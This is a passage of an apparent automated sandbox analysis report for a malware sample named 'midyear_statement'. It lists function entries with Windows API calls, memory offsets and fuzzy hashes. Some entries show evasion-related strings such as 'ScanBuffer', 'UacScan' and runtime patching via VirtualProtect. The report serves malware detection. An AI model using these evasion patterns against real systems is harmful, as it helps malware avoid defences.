                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 779948276-0
                                                                                                                                                                                          • Opcode ID: 11eb1e625078cb91fdce5f6950e59b7a61aedf5335027e79d41f728c7ba2bbc9
                                                                                                                                                                                          • Instruction ID: d658e6746ea5991900c715c74e47314201393c1f672f057bbd78432c921337f5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 11eb1e625078cb91fdce5f6950e59b7a61aedf5335027e79d41f728c7ba2bbc9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 23114C75640608AFEB00EFF9EC81ADEBBE8EB48608F804561F544E7250DB75FE618B54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyA.ADVAPI32(?,00000000,041F48C8), ref: 040BD5DC
                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(00000868,00000000,00000000,00000001,00000000,0000001C,00000000,040BD647), ref: 040BD614
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000868,00000868,00000000,00000000,00000001,00000000,0000001C,00000000,040BD647), ref: 040BD61F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 779948276-0
                                                                                                                                                                                          • Opcode ID: aa80ba9d7608a97f3c07c91d5be0fca413942939871db3a6bcedb32edff8ebaa
                                                                                                                                                                                          • Instruction ID: 495364a6b07f21845f1546992461085dd66a3303431d44cc04d5aef0e4c0002f
                                                                                                                                                                                          • Opcode Fuzzy Hash: aa80ba9d7608a97f3c07c91d5be0fca413942939871db3a6bcedb32edff8ebaa
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C114C75640608AFEB00EFF9EC81ADEBBE8EB48608F804561F544E7250DB75FE618B54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(?,00000000,040B7C3A), ref: 040B7BB8
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(?,?,00000000,040B7C3A), ref: 040B7BBE
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 040B7BD7
                                                                                                                                                                                            • Part of subcall function 040B7AC0: GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,040B7B45,?,?,00000000,00000000), ref: 040B7B01
                                                                                                                                                                                            • Part of subcall function 040B7AC0: GetProcAddress.KERNEL32(00000000,kernel32), ref: 040B7B07
                                                                                                                                                                                            • Part of subcall function 040B7AC0: VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,040B7B45,?,?,00000000,00000000), ref: 040B7B21
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc$LibraryLoadProtectVirtual
• String ID:
• API String ID: 2543409266-0
• Opcode ID: d0248a79b8189b5bc25fe6d570cff0bb3fa706c2e40069801b6a99d6fa9700d8
• Instruction ID: db86ef1b1392de1ff60ea32531ce0e26f6f76d64c4be1de46c84ce93da953336
• Opcode Fuzzy Hash: d0248a79b8189b5bc25fe6d570cff0bb3fa706c2e40069801b6a99d6fa9700d8
• Instruction Fuzzy Hash: 4001C874600204AFF745EBF4EA41B9E7BA8DB8830CF148464A245BB690DB7ABD108B58
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
• Opcode ID: aad5d7e2dbc8a5d7d7e6a823b1a559edd35215eebda437dbf07fc5f79c2292d6
• Instruction ID: 479fb0efb9746c4d7856411cc83cb13d9bd4caffd6425c4040e5e50b2a22dc3e
• Opcode Fuzzy Hash: aad5d7e2dbc8a5d7d7e6a823b1a559edd35215eebda437dbf07fc5f79c2292d6
• Instruction Fuzzy Hash: F8F0AF7178811086AB207BF8D8889EE3A999F4421C7104669E14ABB111DB24BC36A3E2
Uniqueness

Uniqueness Score: -1.00%

APIs
• SysFreeString.OLEAUT32(040BD6AC), ref: 040A4BDE
• SysAllocStringLen.OLEAUT32(?,?), ref: 040A4CCB
• SysFreeString.OLEAUT32(00000000), ref: 040A4CDD
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: String$Free$Alloc
• String ID:
• API String ID: 986138563-0
• Opcode ID: 5bd30a3f01854c66fdfb21c9481b34454127c867239492e85848eeb07452f874
• Instruction ID: 2d52cf6a8566d29bd8716e76fb4476510ec54af51e8cd881988e3047cb9ad9f9
• Opcode Fuzzy Hash: 5bd30a3f01854c66fdfb21c9481b34454127c867239492e85848eeb07452f874
• Instruction Fuzzy Hash: BAE0ECBC2152015EFA542FA09C50BBA3269AFC1758F6444A9A410EE150D778F470A628
Uniqueness

Uniqueness Score: -1.00%

APIs
• SysFreeString.OLEAUT32(?), ref: 040B731E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: FreeString
• String ID: H
• API String ID: 3341692771-2852464175
• Opcode ID: 6b5bdba04471348a7cceef3e888a8fb6dddcefff7c3bd31128ce9544eb6ac80f
• Instruction ID: aa974be4a4f55ca8817fe10729acf791b682a39e53ea11a4d0065abaf7737cc3
• Opcode Fuzzy Hash: 6b5bdba04471348a7cceef3e888a8fb6dddcefff7c3bd31128ce9544eb6ac80f
• Instruction Fuzzy Hash: 40B1CE74A01608AFDB54CF98E880ADDBBF2FF89314F248569E845BB360D735A845CF94
Uniqueness

Uniqueness Score: -1.00%

APIs
• VariantCopy.OLEAUT32(00000000,00000000), ref: 040AE6C5
  • Part of subcall function 040AE2A8: VariantClear.OLEAUT32(?), ref: 040AE2B7
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: Variant$ClearCopy
• String ID:
• API String ID: 274517740-0
• Opcode ID: 94b20921437c57bf2c9b247c651fc0c6f4f376f7c22d3569e2a31f5c6eea4469
• Instruction ID: 25f470ca1ec3113afe277e2264c7e3b98d626c71b9b5d900fc850d24486d112f
• Opcode Fuzzy Hash: 94b20921437c57bf2c9b247c651fc0c6f4f376f7c22d3569e2a31f5c6eea4469
• Instruction Fuzzy Hash: ED11C66034021087E720AFB5C8C4DAF3BDA9F952587084865E44ABF295EA30FC61D3D2
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: InitVariant
• String ID:
• API String ID: 1927566239-0
• Opcode ID: 69320b788e330c48ef4b2934b6f83dc08a56234b5f8f748247242f1833b0a2af
• Instruction ID: 084799056ac30d9afe1481338406d664d1d7e4fb99a430d3ced5061a0a666ef1
• Opcode Fuzzy Hash: 69320b788e330c48ef4b2934b6f83dc08a56234b5f8f748247242f1833b0a2af
• Instruction Fuzzy Hash: 09312E72644109EBDB50DEE8C888AEE77ECEB09204F544561E909E7250D634F964CBE5
Uniqueness

Uniqueness Score: -1.00%

APIs
• CLSIDFromProgID.OLE32(00000000,?,00000000,040B6CFD,?,?,?,00000000), ref: 040B6CDD
  • Part of subcall function 040A4BD0: SysFreeString.OLEAUT32(040BD6AC), ref: 040A4BDE
Memory Dump Source
• Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
• Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
Yara matches
Similarity
• API ID: FreeFromProgString
• String ID:
• API String ID: 4225568880-0
• Opcode ID: 9f90fee341b2f2bbc0227a4ba2ac20c0d78572435885758c6e76f0f60b5b269c
• Instruction ID: 6ed7af38e948ac06289a1dcd64153692e246bebf31411ca6912957b5ddc81e9b
• Opcode Fuzzy Hash: 9f90fee341b2f2bbc0227a4ba2ac20c0d78572435885758c6e76f0f60b5b269c
• Instruction Fuzzy Hash: CDE0E535614208BBF702EBA0DC11EDA77ACDB8960CB520871E400F2210DA717D1484A5
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleFileNameA.KERNEL32(040A0000,?,00000105), ref: 040A57F6
  • Part of subcall function 040A5A3C: GetModuleFileNameA.KERNEL32(00000000,?,00000105,040A0000,040CC790), ref: 040A5A58
  • Part of subcall function 040A5A3C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,040A0000,040CC790), ref: 040A5A76
  • Part of subcall function 040A5A3C: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,040A0000,040CC790), ref: 040A5A94
  • Part of subcall function 040A5A3C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 040A5AB2
                                                                                                                                                                                            • Part of subcall function 040A5A3C: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,040A5B41,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 040A5AFB
                                                                                                                                                                                            • Part of subcall function 040A5A3C: RegQueryValueExA.ADVAPI32(?,040A5CA8,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,040A5B41,?,80000001), ref: 040A5B19
                                                                                                                                                                                            • Part of subcall function 040A5A3C: RegCloseKey.ADVAPI32(?,040A5B48,00000000,?,?,00000000,040A5B41,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 040A5B3B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2796650324-0
                                                                                                                                                                                          • Opcode ID: 1e8a0067773dd6e412028901a4fa07187171c54260f06aed7664556dc4e307ba
                                                                                                                                                                                          • Instruction ID: 12a996b1b8e7ee30d510bb28791240ec58bd873b2b0ce0a002d945365fc033af
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e8a0067773dd6e412028901a4fa07187171c54260f06aed7664556dc4e307ba
                                                                                                                                                                                          • Instruction Fuzzy Hash: 39E06D71A002149BDB50DE98DCC0A8633D8BF08658F004A61EC54EF346D7B0E92087D1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 040A7D6C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                          • Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                                                                                                                          • Instruction ID: 52774b3f84f1171e691e8d375af7286b86c030b94e62177ac7d2a25286e39511
                                                                                                                                                                                          • Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 46D05B723081107AE324965E9C44DF76BECCBC9774F14463AB598C3180D720DC018271
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SysFreeString.OLEAUT32(040BD6AC), ref: 040A4BDE
                                                                                                                                                                                          • SysReAllocStringLen.OLEAUT32(040CA580,040BD6AC,00000016), ref: 040A4C26
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: String$AllocFree
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 344208780-0
                                                                                                                                                                                          • Opcode ID: 5ce10666472a565598d7f4b630483a17b03d11c9dd77ca7b670e171da283bfbe
                                                                                                                                                                                          • Instruction ID: dce062d76d989a1908c2869540f73c9655c93f15aaec98a2c0f237633f5d17ea
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ce10666472a565598d7f4b630483a17b03d11c9dd77ca7b670e171da283bfbe
                                                                                                                                                                                          • Instruction Fuzzy Hash: C1D0127C9201015E6BA85ED59D24B3661DA99D0309F8CC6AC94027E650E7E5F4349621
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,?,040BE36F,ScanString,04100344,040C9768,OpenSession,04100344,040C9768,ScanString,04100344,040C9768,UacScan,04100344,040C9768,UacInitialize), ref: 040A7DDF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                          • Opcode ID: 0e95aad3414f9b9c2a2109699958fa49b390097b3f52a26050f892d7429b04e1
                                                                                                                                                                                          • Instruction ID: f73fbd33680711a80eb2cf144c9fbae93e3b5e4de273bd28957837557291925b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e95aad3414f9b9c2a2109699958fa49b390097b3f52a26050f892d7429b04e1
                                                                                                                                                                                          • Instruction Fuzzy Hash: A6C08CA0301200066B90E2FC1CC45A912D8490523C3680F22F469F31E2D623F0362010
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,?,040C13B4,ScanString,04100344,040C9768,OpenSession,04100344,040C9768,OpenSession,04100344,040C9768,ScanBuffer,04100344,040C9768,ScanString), ref: 040A7E03
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                          • Opcode ID: 402d99361340c0d933afbb412631b9ac4ad4834bfd450701127e11a6c8c5f0c3
                                                                                                                                                                                          • Instruction ID: 490ee13a859da315f00ad2c7411a917809b853fdb577ae92a4101d7a4b22aef4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 402d99361340c0d933afbb412631b9ac4ad4834bfd450701127e11a6c8c5f0c3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 40C08CB12012000AAFD0E5FC1CC118A42C80A2913C7A41F31E468F32D2D233F8372010
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeString
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3341692771-0
                                                                                                                                                                                          • Opcode ID: 022aca0795f7a4c93c8e5bd2fafd073bcc6474edabc63fef6319f9c00722eb75
                                                                                                                                                                                          • Instruction ID: b39de8b19916fd1d8d8eb4ea7b243256e8785bdbbff2b128da79d636f064e539
                                                                                                                                                                                          • Opcode Fuzzy Hash: 022aca0795f7a4c93c8e5bd2fafd073bcc6474edabc63fef6319f9c00722eb75
                                                                                                                                                                                          • Instruction Fuzzy Hash: A7C012B961023057FBE15AD9ACC0B9262CCDB45298F1400A1D405EB240E2A0F8204390
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • timeSetEvent.WINMM(00002710,00000000,040CA27C,00000000,00000001), ref: 040CA298
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Eventtime
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2982266575-0
                                                                                                                                                                                          • Opcode ID: b273326f9a1cac485a09ed5b7e900424ba6793fcde73b8663e9c3194c29aa0b1
                                                                                                                                                                                          • Instruction ID: 9ec49c1490efc6a2c175178baabc2eced6839cf57525832cb8e4779cb825c751
                                                                                                                                                                                          • Opcode Fuzzy Hash: b273326f9a1cac485a09ed5b7e900424ba6793fcde73b8663e9c3194c29aa0b1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 24C09BF07943407AF51057F55CC2F6715CCD344714F910016B700FE2C1D1D65D500690
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SysAllocStringLen.OLEAUT32(00000000,?), ref: 040A4BAF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1367494352.00000000040A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1367976152.00000000040CC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368480960.0000000004100000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1368523014.00000000041F4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40a0000_midyear_statement.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocString
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2525500382-0
                                                                                                                                                                                          • Opcode ID: 5b07472a888e3776e148b0ae0a9523aba3cc3b720f77a61ad4bbe8091deed3d1
                                                                                                                                                                                          • Instruction ID: f22a7355dbeae1e3424c67ce5857e4dcd2f7d0d58d27c575e96b4d3c9e98efe4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b07472a888e3776e148b0ae0a9523aba3cc3b720f77a61ad4bbe8091deed3d1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 44B0923C2182015AFA9026E10D10BB600CC4B40299F8400A89E10F80C1FA84E4355032
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 040A4BC7
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: true
